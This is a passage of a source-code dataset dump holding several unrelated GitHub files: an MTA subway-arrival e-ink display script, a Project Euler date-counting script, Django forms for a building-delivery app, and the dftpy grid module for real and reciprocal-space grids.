f.close()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.close()\n\n def __iter__(self):\n return self\n\n def __next__(self):\n # check for the minimal event id\n if not self._events:\n raise StopIteration\n\n try:\n next_event = self._events.get_nowait()\n except Empty:\n raise StopIteration\n\n stream = next_event.stream\n event = next_event.event\n\n try:\n new = next(self._events_tables[stream])\n self._events.put_nowait(NextEvent(new.event_id, new, stream))\n except StopIteration:\n if self.all_subruns:\n try:\n self._load_next_subrun(stream)\n except FileNotFoundError:\n pass\n\n return event\n","repo_name":"cta-observatory/ctapipe_io_lst","sub_path":"src/ctapipe_io_lst/multifiles.py","file_name":"multifiles.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17731185043","text":"from underground import metadata, SubwayFeed\nfrom PIL import Image, ImageFont, ImageDraw\nfrom inky import InkyPHAT\nfrom functools import reduce\nfrom datetime import datetime\nfrom dotenv import Dotenv\nimport os\n\ndotenv = Dotenv(os.path.join(os.path.dirname(__file__), '.envrc'))\nos.environ.update(dotenv)\n\ninky_display = InkyPHAT(\"yellow\")\ninky_display.set_border(inky_display.WHITE)\nfont = ImageFont.truetype(\n \"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\", 24)\nsmall_font = ImageFont.truetype(\n \"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\", 8)\n\nAPI_KEY = os.getenv('MTA_API_KEY')\n\nQ_ROUTE = 'Q'\nB_ROUTE = 'B'\nSTATIONS = [\n {\"route\": Q_ROUTE, \"station\": 'D24N', \"direction\": 'North'},\n {\"route\": B_ROUTE, \"station\": 'D24N', \"direction\": 'North'}\n]\n\n\ndef get_station_times(station_data):\n route = station_data.get('route')\n station = station_data.get('station')\n feed = SubwayFeed.get(route, api_key=API_KEY)\n stops = 
feed.extract_stop_dict().get(route, dict()).get(station, [])\n labeled_stops = [{\"route\": route, \"time\": t} for t in stops]\n return labeled_stops\n\n\ndef draw_route(draw, route, y):\n bg_color = inky_display.YELLOW if route == Q_ROUTE else inky_display.WHITE\n fg_color = inky_display.WHITE if route == Q_ROUTE else inky_display.BLACK\n outline = inky_display.YELLOW if route == Q_ROUTE else inky_display.BLACK\n x_pos = 18 if route == Q_ROUTE else 20\n draw.ellipse([(12, y), (42, y+30)], bg_color, outline)\n draw.text((x_pos, y + 1), route, fg_color, font)\n\n\ndef draw_time(draw, time, y):\n draw.text((48, y), time.strftime('%-I:%M %p'), inky_display.BLACK, font)\n\n\ndef draw_row(draw, arrival, y):\n draw_route(draw, arrival.get('route', ''), y)\n draw_time(draw, arrival.get('time', ''), y)\n\n\ndef draw_updated(draw):\n message = 'Updated: {}'.format(datetime.now().strftime('%-I:%M:%S %p'))\n w, h = small_font.getsize(message)\n\n x = (inky_display.WIDTH - w)\n y = (inky_display.HEIGHT - h)\n draw.text((x, y,), message, inky_display.BLACK, small_font)\n\n\ndef print_to_inky(train_one, train_two):\n img = Image.new(\"P\", (inky_display.WIDTH, inky_display.HEIGHT))\n draw = ImageDraw.Draw(img)\n draw.line([(0, inky_display.HEIGHT / 2), (inky_display.WIDTH,\n inky_display.HEIGHT / 2)], inky_display.BLACK, 1)\n draw_row(draw, train_one, 14)\n draw_row(draw, train_two, inky_display.HEIGHT - 42)\n draw_updated(draw)\n inky_display.set_image(img)\n inky_display.show()\n\n\ndef main():\n times = reduce(lambda x, y: x+y,\n [get_station_times(station) for station in STATIONS])\n sorted_times = sorted(times, key=lambda k: k['time'])\n # first = sorted_times[0]\n # second = sorted_times[1]\n first, second, *_ = sorted_times\n print_to_inky(first, second)\n\n\nmain()\n","repo_name":"ChrisW-B/inky-subway","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14918905853","text":"sundayCount = 0\ntotalDay = 0\nmonths = [('Jan',31),('Feb',28),('Mar',31),('Apr',30),('May',31),('Jun',30),('Jul',31),('Aug',31),('Sep',30),('Oct',31),('Nov',30),('Dec',31)]\nfor year in range(1900,2001):\n for month in months:\n if month[0]=='Feb' and year%4==0 and year!=0:\n print(year,month[0],month[1]+1,\"leap year\")\n totalDay=totalDay+month[1]+1\n else :\n print(year,month[0],month[1])\n totalDay=totalDay+month[1]\n print(totalDay,(totalDay-6)%7)\n if (totalDay-6)%7 == 0 and year>1900:\n sundayCount+=1\nprint(sundayCount)\nprint(sundayCount-1)\n","repo_name":"stealpotsyear/algorithm_basic","sub_path":"project euler/Problem19.py","file_name":"Problem19.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24505040961","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.db.models import Q\nfrom .models import Entrega, Morador, Porteiro\nfrom django.forms.widgets import DateTimeInput\n\n\n\nclass EntregaForm(forms.ModelForm):\n nome = forms.CharField(required=True, label='Nome')\n bloco = forms.IntegerField(required=True, label='Bloco')\n apartamento = forms.IntegerField(required=True, label='Apartamento')\n andar = forms.IntegerField(required=True, label='Andar')\n email = forms.EmailField(required=True, label='Email') \n entrada = forms.DateTimeField(required=False, label='Data de Entrada', widget=DateTimeInput(attrs={'type': 
'datetime-local'}))\n porteiro = forms.ModelChoiceField(queryset=Porteiro.objects.all(), empty_label=\"Selecione um porteiro\", label=\"Porteiro\")\n \n\n\n class Meta:\n model = Entrega\n fields = [\n 'nome',\n 'bloco',\n 'andar',\n 'apartamento',\n 'email',\n 'entrada',\n 'porteiro'\n\n ]\n labels = {\n 'morador': 'Morador',\n 'nome': 'Nome',\n 'bloco': 'Bloco',\n 'andar': 'Andar',\n 'apartamento': 'Apartamento',\n 'email': 'Email',\n 'entrada': 'Data de Entrada',\n 'porteiro': 'Porteiro'\n\n }\n\n\nclass MoradorForm(forms.ModelForm):\n nome = forms.CharField(required=True, label='Nome')\n bloco = forms.IntegerField(required=True, label='Bloco')\n apartamento = forms.IntegerField(required=True, label='Apartamento')\n andar = forms.IntegerField(required=True, label='Andar')\n email = forms.EmailField(required=True, label='Email')\n\n class Meta:\n model = Morador\n fields = [\n 'nome',\n 'bloco',\n 'andar',\n 'apartamento',\n 'email',\n ]\n labels = {\n 'nome': 'Nome',\n 'bloco': 'Bloco',\n 'andar': 'Andar',\n 'apartamento': 'Apartamento',\n 'email': 'Email',\n }\n\n def clean(self):\n cleaned_data = super().clean()\n nome = cleaned_data.get('nome')\n bloco = cleaned_data.get('bloco')\n apartamento = cleaned_data.get('apartamento')\n andar = cleaned_data.get('andar')\n email = cleaned_data.get('email')\n\n if Morador.objects.filter(Q(nome=nome) & Q(bloco=bloco) & Q(apartamento=apartamento) & Q(andar=andar) & Q(email=email)).exists():\n raise ValidationError('Morador já cadastrado') \n\n\n","repo_name":"Willartes/projeto","sub_path":"entregas/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"543510881","text":"import numpy as np\nfrom scipy.interpolate import splrep, splev\nimport scipy.special as sp\nfrom ase.cell import Cell\nfrom dftpy.math_utils import spacing2ecut, ecut2nr\nfrom dftpy.mpi import MP\n\nclass BaseGrid:\n \"\"\"\n Object representing a grid (Cell (lattice) plus discretization)\n extends Cell\n\n Attributes\n ----------\n nr : array of numbers used for discretization\n\n nnr : total number of grid points\n\n dV : volume of a grid point\n\n Node:\n Virtual class, DirectGrid and ReciprocalGrid should be used in actual applications\n\n \"\"\"\n\n def __init__(self, lattice, nr = None, origin=np.array([0.0, 0.0, 0.0]), full=True, direct=True,\n cplx=False, mp=None, ecut = None, comm = None, **kwargs):\n if mp is None :\n mp = MP(comm)\n self._origin = np.asarray(origin)\n if not isinstance(lattice, Cell):\n cell=Cell(lattice)\n else:\n cell=lattice\n #\n self.cplx = cplx\n self._cell = cell\n self._direct = direct\n #\n if nr is None : nr = ecut2nr(ecut=ecut, lattice=lattice, **kwargs)\n #\n self._nrR = np.array(nr, dtype = np.int32)\n self._nnrR = np.prod(self._nrR)\n self._dV = np.abs(self.cell.volume) / self._nnrR\n self._nrG = self._nrR.copy()\n if not full :\n self._nrG[-1] = self._nrG[-1] // 2 + 1\n self._nnrG = np.prod(self._nrG)\n self._spacings = self.cell.lengths() / self._nrR\n self._mp = mp\n if self.cplx :\n full = True\n self.local_slice(nr, direct = direct, full = full, cplx = cplx, **kwargs)\n self._nnr = np.prod(self._nr)\n # print('nr_local', self.mp.comm.rank, self._nr, direct, self.mp.comm.size, flush = True)\n self._full = full\n self._ecut = ecut\n\n def __eq__(self, other: 'BaseGrid') -> bool:\n if np.allclose(self.lattice, other.lattice) and np.allclose(self.nrR, other.nrR):\n return True\n else :\n return False\n\n 
@property\n def mp(self):\n return self._mp\n\n @mp.setter\n def mp(self, value):\n self._mp = value\n\n @property\n def nr(self):\n return self._nr\n\n @property\n def nnr(self):\n return self._nnr\n\n @property\n def nrR(self):\n return self._nrR\n\n @property\n def nnrR(self):\n return self._nnrR\n\n @property\n def nrG(self):\n return self._nrG\n\n @property\n def nnrG(self):\n return self._nnrG\n\n @property\n def dV(self):\n return self._dV\n\n @property\n def volume(self):\n return self.cell.volume\n\n @property\n def spacings(self):\n return self._spacings\n\n @property\n def cell(self):\n return self._cell\n\n @property\n def full(self):\n return self._full\n\n @property\n def direct(self):\n return self._direct\n\n @property\n def origin(self):\n return self._origin\n\n def tile(self, reps=1):\n # it only repeat last three dimensions with same rep\n if self.mp.size > 1:\n raise ValueError(\"Only works for serial version.\")\n try:\n tup = tuple(reps)\n except TypeError:\n tup = (reps,)\n reps = np.ones(3, dtype='int')\n for i, x in enumerate(tup):\n reps[i] = x\n lattice = self.lattice.copy()\n for i in range(3):\n lattice[i] *= reps[i]\n nr = self.nr * reps\n results = self.__class__(lattice, nr, origin=self.origin, full=self.full, cplx=self.cplx, direct=self.direct)\n return results\n\n def create(self, lattice=None, **kwargs):\n options={\n 'origin' : self.origin,\n 'full' : self.full,\n 'cplx' : self.cplx,\n 'mp' : self.mp,\n 'ecut' : self.ecut,\n }\n if lattice is None: lattice = self.cell\n options.update(kwargs)\n results = self.__class__(lattice, **options)\n return results\n\n def repeat(self, rep=1):\n # it only repeat last three dimensions with same rep\n if not isinstance(rep, int):\n raise AttributeError(\"Grid repeat only support one integer, Please use 'tile'.\")\n if self.rank == 1 :\n reps = np.ones(3, dtype='int')*rep\n return self.tile(reps)\n\n def local_slice(self, nr, **kwargs):\n self._slice, self._nr, self._offsets = self.mp.get_local_fft_shape(nr, **kwargs)\n if self.mp.is_mpi :\n self.slice_all = self.mp.comm.allgather(self._slice)\n self.nr_all = self.mp.comm.allgather(self._nr)\n self.offsets_all = self.mp.comm.allgather(self._offsets)\n else :\n self.slice_all = self._slice\n self.nr_all = self._nr\n self.offsets_all = self._offsets\n\n @property\n def slice(self):\n return self._slice\n\n @property\n def offsets(self):\n return self._offsets\n\n def gather(self, data, nr = None, out = None, root = 0, **kwargs):\n if self.mp.is_mpi :\n reqs = []\n bufs = []\n rank = 1 if getattr(data, 'ndim', 1) < 4 else data.shape[0]\n if self.mp.rank == root:\n if out is None :\n if nr is None : nr = self.nrR\n if rank>1 : nr = (rank, *nr)\n out = np.empty(nr, dtype = data.dtype)\n for i in range(0, self.mp.comm.size):\n if i == root :\n buf = data\n else :\n shape = self.nr_all[i]\n if rank>1 : shape = (rank, *shape)\n buf = np.empty(shape, dtype = data.dtype)\n req = self.mp.comm.Irecv(buf, source = i, tag = i)\n reqs.append(req)\n bufs.append(buf)\n else :\n req = self.mp.comm.Isend(data, dest = root, tag = self.mp.rank)\n reqs.append(req)\n out = np.ones(rank)\n self.mp.MPI.Request.Waitall(reqs)\n if self.mp.rank == root:\n for i in range(0, self.mp.comm.size):\n inds = self.slice_all[i]\n if rank>1 : inds = (slice(None), *inds)\n out[inds] = bufs[i]\n self.mp.comm.Barrier()\n else :\n if out is None :\n out = data.copy()\n else :\n out[:] = data\n return out\n\n def scatter(self, data, out = None, root = 0, **kwargs):\n if self.mp.is_mpi :\n reqs = []\n rank = 
1 if getattr(data, 'ndim', 1) < 4 else data.shape[0]\n rank = self.mp.amax(rank)\n if out is None :\n nr = self.nr\n if rank>1 : nr = (rank, *nr)\n out = np.empty(nr, dtype = data.dtype)\n if self.mp.rank == root :\n for i in range(0, self.mp.comm.size):\n if i == root :\n inds = self.slice_all[i]\n if rank>1 : inds = (slice(None), *inds)\n out[:] = data[inds]\n else :\n shape = self.nr_all[i]\n inds = self.slice_all[i]\n if rank>1 :\n shape = (rank, *shape)\n inds = (slice(None), *inds)\n buf = np.empty(shape, dtype = data.dtype)\n buf[:] = data[inds]\n req = self.mp.comm.Isend(buf, dest = i, tag = i)\n reqs.append(req)\n else :\n req = self.mp.comm.Irecv(out, source = root, tag = self.mp.rank)\n reqs.append(req)\n self.mp.MPI.Request.Waitall(reqs)\n self.mp.comm.Barrier()\n else :\n if out is None :\n out = data.copy()\n else :\n out[:] = data\n return out\n\n def free(self):\n self.mp.free()\n\n @property\n def lattice(self):\n return self.cell.array\n\n @property\n def ecut(self):\n if self._ecut is None :\n if hasattr(self, 'guess_ecut'):\n ecut = self.guess_ecut()\n elif hasattr(self, 'get_direct'):\n ecut = self.get_direct().guess_ecut()\n else :\n ecut = None\n else :\n ecut = self._ecut\n return ecut\n\n @ecut.setter\n def ecut(self, value):\n self._ecut = value\n if hasattr(self, 'Dgrid'):\n self._qmask = None\n if hasattr(self.Dgrid, '_ecut'):\n self.Dgrid._ecut = value\n elif hasattr(self, 'RPgrid'):\n if hasattr(self.RPgrid, '_ecut'):\n self.RPgrid._ecut = value\n self.RPgrid._qmask = None\n\n\nclass DirectGrid(BaseGrid):\n \"\"\"\n Attributes:\n ----------\n All of BaseGrid and DirectCell\n\n r : cartesian coordinates of each grid point\n\n s : crystal coordinates of each grid point\n \"\"\"\n\n def __init__(self, lattice, nr = None, origin=np.array([0.0, 0.0, 0.0]), full=True, uppergrid=None, **kwargs):\n \"\"\"\n Parameters\n ----------\n lattice : array_like[3,3]\n matrix containing the direct lattice vectors (as its colums)\n \"\"\"\n self.init_options = locals()\n for k in ['__class__', 'self', 'kwargs', 'uppergrid'] :\n self.init_options.pop(k, None)\n self.init_options.update(kwargs)\n super().__init__(lattice=lattice, nr=nr, origin=origin, full=full, direct=True, **kwargs)\n self._r = None\n self._rr = None\n self._s = None\n self.RPgrid = uppergrid\n self._Rtable = None\n\n def __eq__(self, other):\n \"\"\"\n Implement the == operator in the DirectGrid class.\n Refer to the __eq__ method of Grid for more information.\n \"\"\"\n if not isinstance(other, DirectGrid):\n raise TypeError(\"You can only compare a DirectGrid with another DirectGrid\")\n return BaseGrid.__eq__(self, other)\n\n def _calc_grid_crys_points(self):\n if self._s is None:\n # s0 = np.linspace(0, 1, self.nr[0], endpoint=False)\n # s1 = np.linspace(0, 1, self.nr[1], endpoint=False)\n # s2 = np.linspace(0, 1, self.nr[2], endpoint=False)\n # S0, S1, S2 = np.meshgrid(s0, s1, s2, indexing=\"ij\")\n # self._s = np.asarray([S0, S1, S2])\n ax = []\n for i in range(3):\n s0 = np.linspace(0, 1, self.nrR[i], endpoint=False)\n ax.append(s0)\n AX = [a[sl] for a, sl in zip(ax, self.slice)]\n S = np.meshgrid(*AX, indexing=\"ij\")\n self._s = np.asarray(S)\n\n def _calc_grid_cart_points(self):\n if self._r is None:\n self._r = np.einsum(\"j...,jk->k...\", self.s, self.lattice)\n\n @property\n def r(self):\n if self._r is None:\n self._calc_grid_cart_points()\n return self._r\n\n @property\n def rr(self):\n if self._rr is None:\n rr = np.einsum(\"lijk,lijk->ijk\", self.r, self.r)\n # self._rr = np.reshape(rr, 
[self.nr[0], self.nr[1], self.nr[2], 1])\n self._rr = rr\n return self._rr\n\n @property\n def s(self):\n if self._s is None:\n self._calc_grid_crys_points()\n return self._s\n\n @property\n def full(self):\n return self._full\n\n @full.setter\n def full(self, value):\n if self._full != value :\n '''\n Clean stored information of reciprocal grid.\n '''\n self._full = value\n self.RPgrid = None\n self._nrG = self.nr.copy()\n if not self._full:\n self._nrG[-1] = self._nrG[-1] // 2 + 1\n\n def get_reciprocal(self, scale=None, convention: str = \"physics\") -> 'ReciprocalGrid':\n r\"\"\"\n Returns a new ReciprocalCell, the reciprocal cell of self\n The ReciprocalCell is scaled properly to include\n the scaled (*self.nr) reciprocal grid points\n -----------------------------\n Note1: We need to use the 'physics' convention where bg^T = 2 \\pi * at^{-1}\n physics convention defines the reciprocal lattice to be\n exp^{i G \\cdot R} = 1\n Now we have the following \"crystallographer's\" definition ('crystallograph')\n which comes from defining the reciprocal lattice to be\n e^{2\\pi i G \\cdot R} =1\n In this case bg^T = at^{-1}\n -----------------------------\n Note2: We have to use 'Bohr' units to avoid changing hbar value\n \"\"\"\n # TODO define in constants module hbar value for all units allowed\n if self.RPgrid is None or scale is not None:\n if scale is None :\n scale=[1.0, 1.0, 1.0]\n scale = np.array(scale)\n fac = 1.0\n if convention == \"physics\" or convention == \"p\":\n fac = 2 * np.pi\n fac = 2 * np.pi\n bg = fac * np.linalg.inv(self.lattice)\n bg = bg.T\n reciprocal_lat = np.einsum(\"ij,i->ij\", bg, scale)\n\n self.RPgrid = ReciprocalGrid(lattice=reciprocal_lat, nr=self.nrR, full=self.full, uppergrid=self,\n cplx=self.cplx, mp=self.mp, ecut = self.ecut)\n return self.RPgrid\n\n def get_Rtable(self, rcut=10):\n '''Only support for serial'''\n if self._Rtable is None:\n self._Rtable = {}\n metric = np.dot(self.lattice, self.lattice.T)\n latticeConstants = np.sqrt(np.diag(metric))\n gaps = latticeConstants / self.nr\n Nmax = np.ceil(rcut / gaps).astype(np.int32) + 1\n # print('lc', latticeConstants)\n # print('gaps', gaps)\n # print(Nmax)\n # mgrid = np.mgrid[0:Nmax[0], 0:Nmax[0], 0:Nmax[0]].reshape((3, -1))\n # array = np.einsum('jk,ij->ik',gridpos,self.lattice)\n # dists = np.einsum('ij,ij->j', array, array)\n # index = np.arange(0, Nmax[0] * Nmax[1] * Nmax[2]).reshape(Nmax)\n # mgrid = np.mgrid[0:Nmax[0], 0:Nmax[1], 0:Nmax[2]].astype(np.float64)\n mgrid = np.mgrid[1 - Nmax[0] : Nmax[0], 1 - Nmax[1] : Nmax[1], 1 - Nmax[2] : Nmax[2]].astype(np.float64)\n mgrid[0] /= self.nr[0]\n mgrid[1] /= self.nr[1]\n mgrid[2] /= self.nr[2]\n gridpos = mgrid.astype(np.float64)\n array = np.einsum(\"jklm,ji->iklm\", gridpos, self.lattice)\n dists = np.sqrt(np.einsum(\"ijkl,ijkl->jkl\", array, array))\n self._Rtable[\"Nmax\"] = Nmax\n self._Rtable[\"table\"] = dists\n return self._Rtable\n\n def gather(self, data, out = None, **kwargs):\n value = super().gather(data, self.nrR, out = out, **kwargs)\n return value\n\n def get_array_mask(self, xyz):\n if self.mp.comm.size == 1: return slice(None)\n offsets = self.offsets.reshape((3, 1))\n nr = self.nr\n # -----------------------------------------------------------------------\n xyz -= offsets\n mask = np.logical_and(xyz[0] > -1, xyz[0] < nr[0])\n mask1 = np.logical_and(xyz[1] > -1, xyz[1] < nr[1])\n np.logical_and(mask, mask1, out=mask)\n np.logical_and(xyz[2] > -1, xyz[2] < nr[2], out=mask1)\n np.logical_and(mask, mask1, out=mask)\n # 
-----------------------------------------------------------------------\n return mask\n\n def guess_ecut(self):\n spacings2 = self.cell.lengths() / (self._nrR - 1)\n spacings = 0.5*(self.spacings + spacings2)\n return spacing2ecut(spacings.max())\n\nclass ReciprocalGrid(BaseGrid):\n \"\"\"\n Attributes:\n ----------\n All of BaseGrid and DirectCell\n\n g : coordinates of each point in the reciprocal cell\n\n gg : square of each g vector\n \"\"\"\n\n def __init__(self, lattice, nr = None, origin=np.array([0.0, 0.0, 0.0]), full=True, uppergrid=None, **kwargs):\n \"\"\"\n Parameters\n ----------\n lattice : array_like[3,3]\n matrix containing the direct lattice vectors (as its colums)\n \"\"\"\n self.init_options = locals()\n for k in ['__class__', 'self', 'kwargs', 'uppergrid'] :\n self.init_options.pop(k, None)\n self.init_options.update(kwargs)\n super().__init__(lattice=lattice, nr=nr, origin=origin, full=full, direct=False, **kwargs)\n self._g = None\n self._gg = None\n self.Dgrid = uppergrid\n self._q = None\n self._mask = None\n self._gF = None\n self._ggF = None\n self._invgg = None\n self._invq = None\n self._gmask = None\n\n def __eq__(self, other):\n \"\"\"\n Implement the == operator in the ReciprocalGrid class.\n Refer to the __eq__ method of Grid for more information.\n \"\"\"\n if not isinstance(other, ReciprocalGrid):\n raise TypeError(\"You can only compare a ReciprocalGrid with another ReciprocalGrid\")\n return BaseGrid.__eq__(self, other)\n\n @property\n def g(self):\n if self._g is None:\n self._g = self._calc_grid_points()\n return self._g\n\n @property\n def q(self):\n if self._q is None:\n self._q = np.sqrt(self.gg)\n return self._q\n\n @property\n def gg(self):\n if self._gg is None:\n if self._g is None:\n self._g = self._calc_grid_points()\n gg = np.einsum(\"lijk,lijk->ijk\", self._g, self._g)\n self._gg = gg\n return self._gg\n\n @property\n def invgg(self):\n if self._invgg is None:\n if self.mp.is_root :\n self.gg[0, 0, 0] = 1.0\n invgg = 1.0/self.gg\n if self.mp.is_root :\n self.gg[0, 0, 0] = 0.0\n invgg[0, 0, 0] = 0.0\n self._invgg = invgg\n return self._invgg\n\n @property\n def invq(self):\n if self._invq is None:\n if self.mp.is_root :\n self.q[0, 0, 0] = 1.0\n invq = 1.0/self.q\n if self.mp.is_root :\n self.q[0, 0, 0] = 0.0\n invq[0, 0, 0] = 0.0\n self._invq = invq\n return self._invq\n\n def get_direct(self, scale= None, convention=\"physics\"):\n r\"\"\"\n Returns a new DirectCell, the direct cell of self\n The DirectCell is scaled properly to include\n the scaled (*self.nr) reciprocal grid points\n -----------------------------\n Note1: We need to use the 'physics' convention where bg^T = 2 \\pi * at^{-1}\n physics convention defines the reciprocal lattice to be\n exp^{i G \\cdot R} = 1\n Now we have the following \"crystallographer's\" definition ('crystallograph')\n which comes from defining the reciprocal lattice to be\n e^{2\\pi i G \\cdot R} =1\n In this case bg^T = at^{-1}\n -----------------------------\n \"\"\"\n # TODO define in constants module hbar value for all units allowed\n if self.Dgrid is None or scale is not None:\n if scale is None :\n scale=[1.0, 1.0, 1.0]\n scale = np.array(scale)\n fac = 1.0\n if convention == \"physics\" or convention == \"p\":\n fac = 1.0 / (2 * np.pi)\n at = np.linalg.inv(self.lattice.T * fac)\n direct_lat = np.einsum(\"ij,i->ij\", at, 1.0 / scale)\n self.Dgrid = DirectGrid(lattice=direct_lat, nr=self.nrR, full=self.full, uppergrid=self, cplx=self.cplx,\n mp=self.mp, ecut = self._ecut)\n return self.Dgrid\n\n def 
_calc_grid_points(self, full=None):\n ax = []\n for i in range(3):\n # use fftfreq function so we don't have to\n # worry about odd or even number of points\n # dd: this choice of \"spacing\" is due to the\n # definition of real and reciprocal space for\n # a grid (which is not exactly a conventional\n # lattice), specifically:\n # 1) the real-space points go from 0 to 1 in\n # crystal coords in n steps of length 1/n\n # 2) thus the reciprocal space (g-space)\n # crystal coords go from 0 to n in n steps\n # 3) the \"physicists\" 2*np.pi factor is\n # included in the definition of reciprocal\n # lattice vectors in the \"grid\" class and\n # is applied with s2r in going from crystal\n # to Cartesian g-space\n dd = 1 / self.nrR[i]\n if full is None:\n full = self.full\n if i == 2 and not full:\n ax.append(np.fft.rfftfreq(self.nrR[i], d=dd))\n else:\n freq = np.fft.fftfreq(self.nrR[i], d=dd)\n # if freq.size % 2 == 0 :\n # freq[freq.size//2] *= -1\n # ax.append(freq)\n # else :\n # ax.append(freq)\n ax.append(freq)\n AX = [a[sl] for a, sl in zip(ax, self.slice)]\n S = np.meshgrid(*AX, indexing=\"ij\")\n S_cart = np.asarray(S)\n S_cart = np.einsum(\"j...,jk->k...\", S_cart, self.lattice)\n\n return S_cart\n\n @property\n def mask_serial(self):\n if self._mask is None:\n nrR = self.nrR[:3]\n # Dnr = nr[:3]//2\n # Dmod = nr[:3]%2\n # mask = np.ones((nr[0], nr[1], Dnr[2]+1), dtype = bool)\n Dnr = nrR[:3] // 2\n Dmod = nrR[:3] % 2\n mask = np.ones(self.nr[:3], dtype=bool)\n if np.all(self.nr == self.nrR):\n mask[:, :, Dnr[2] + 1 :] = False\n\n mask[0, Dnr[1] + 1 :, 0] = False\n mask[Dnr[0] + 1 :, :, 0] = False\n if Dmod[2] == 0:\n mask[0, 0, Dnr[2]] = False\n mask[0, Dnr[1] + 1 :, Dnr[2]] = False\n mask[Dnr[0] + 1 :, :, Dnr[2]] = False\n if Dmod[1] == 0:\n mask[0, Dnr[1], Dnr[2]] = False\n if Dmod[0] == 0:\n mask[Dnr[0], 0, Dnr[2]] = False\n mask[Dnr[0], Dnr[1] + 1 :, Dnr[2]] = False\n if Dmod[0] == 0:\n mask[Dnr[0], Dnr[1] + 1 :, 0] = False\n if Dmod[1] == 0:\n mask[Dnr[0], Dnr[1], 0] = False\n if Dmod[1] == 0:\n mask[0, Dnr[1], 0] = False\n if all(Dmod == 0):\n mask[Dnr[0], Dnr[1], Dnr[2]] = False\n self._mask = mask\n return self._mask\n\n @property\n def mask(self):\n if self._mask is None:\n nrR = self.nrR[:3]\n Dnr = nrR[:3] // 2 - self.offsets\n mask = np.ones(self.nr[:3], dtype=bool)\n if np.all(self.nrG == self.nrR):\n if Dnr[2] >= 0:\n mask[:, :, Dnr[2] + 1 :] = False\n else:\n mask[:, :, :] = False\n Dnr = np.where(Dnr > 0, Dnr, 0)\n Dmod = nrR[:3] % 2\n if self.offsets[0] == self.offsets[2] == 0 :\n mask[0, Dnr[1] + 1 :, 0] = False\n if self.offsets[2] == 0 :\n mask[Dnr[0] + 1 :, :, 0] = False\n if Dmod[2] == 0:\n if self.offsets[0] == 0 :\n if self.offsets[1] == 0 :\n mask[0, 0, Dnr[2]:Dnr[2]+1] = False\n mask[0, Dnr[1] + 1 :, Dnr[2]:Dnr[2]+1] = False\n mask[Dnr[0] + 1 :, :, Dnr[2]:Dnr[2]+1] = False\n if Dmod[1] == 0 and self.offsets[0] == 0 :\n mask[0, Dnr[1]:Dnr[1]+1, Dnr[2]:Dnr[2]+1] = False\n if Dmod[0] == 0:\n if self.offsets[1] == 0 :\n mask[Dnr[0]:Dnr[0]+1, 0, Dnr[2]:Dnr[2]+1] = False\n mask[Dnr[0]:Dnr[0]+1, Dnr[1] + 1 :, Dnr[2]:Dnr[2]+1] = False\n if Dmod[0] == 0 and self.offsets[2] == 0 :\n mask[Dnr[0]:Dnr[0]+1, Dnr[1] + 1 :, 0] = False\n if Dmod[1] == 0:\n mask[Dnr[0]:Dnr[0]+1, Dnr[1]:Dnr[1]+1, 0] = False\n if Dmod[1] == 0 and self.offsets[2] == 0 :\n mask[0, Dnr[1]:Dnr[1]+1, 0] = False\n if all(Dmod == 0):\n mask[Dnr[0]:Dnr[0]+1, Dnr[1]:Dnr[1]+1, Dnr[2]:Dnr[2]+1] = False\n self._mask = mask\n return self._mask\n\n @property\n def gF(self):\n if self._gF is None:\n self._gF = 
self._calc_grid_points(full=True)\n return self._gF\n\n @property\n def ggF(self):\n if self._ggF is None:\n if self._gF is None:\n self._gF = self._calc_grid_points(full=True)\n ggF = np.einsum(\"lijk,lijk->ijk\", self._gF, self._gF)\n self._ggF = ggF\n return self._ggF\n\n @property\n def full(self):\n return self._full\n\n @full.setter\n def full(self, value):\n if self._full != value :\n self._full = value\n\n @property\n def g2max(self):\n return 2.0*self.ecut\n\n def get_gmask(self, g2max = None):\n if g2max is None : return self.gmask\n gmask = self.gg <= g2max\n return gmask\n\n @property\n def gmask(self):\n if self._gmask is None :\n self._gmask = self.get_gmask(self.g2max)\n return self._gmask\n\n\nclass RadialGrid(object):\n def __init__(self, r = None, v = None, direct = True, vr = None, **kwargs):\n self._r = r\n self._v = v\n self._vr = vr\n self._v_interp = None\n self.direct = direct\n\n @property\n def r(self):\n return self._r\n\n @r.setter\n def r(self, r):\n self._r = r\n\n @property\n def v(self):\n return self._v\n\n @v.setter\n def v(self, v):\n self._v = v\n\n @property\n def vr(self):\n return self._vr\n\n @property\n def v_interp(self):\n if self._v_interp is None :\n self._v_interp = splrep(self.r, self.v)\n return self._v_interp\n\n def to_3d_grid(self, dist, direct = None, out = None):\n if out is None :\n results = np.zeros_like(dist)\n else :\n results = out\n mask = dist < self._r[-1]\n if np.count_nonzero(mask) > 0 :\n results[mask] = splev(dist[mask], self.v_interp, der=0, ext=1)\n return results\n\n def _ft(self, x, method='simpson', comm=None, mp=None, **kwargs):\n v = self.v\n r = self.r\n if mp is None : mp = MP(comm = comm)\n vp = np.zeros_like(x)\n\n if method == 'simpson':\n from scipy.integrate import simps as integrate\n elif method == 'trapezoid':\n from scipy.integrate import trapz as integrate\n\n if self.vr :\n vr = v * r\n else :\n vr = v * r * r\n\n lb, ub = mp.split_number(len(x))\n\n for k in range(lb, ub):\n y = sp.spherical_jn(0, x[k] * r) * vr\n vp[k] = integrate(y, r)\n\n vp = mp.vsum(vp)\n\n return vp\n\n def ft(self, x, method='simpson', mp=None, **kwargs):\n y = self._ft(x, method=method, mp=mp, **kwargs)\n if self.direct :\n y *= (4.0 * np.pi)\n else :\n y *= (0.5 / np.pi ** 2)\n return y\n","repo_name":"shaoxc/dftpy","sub_path":"src/dftpy/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":27518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70024330455","text":"import numpy as np\nimport 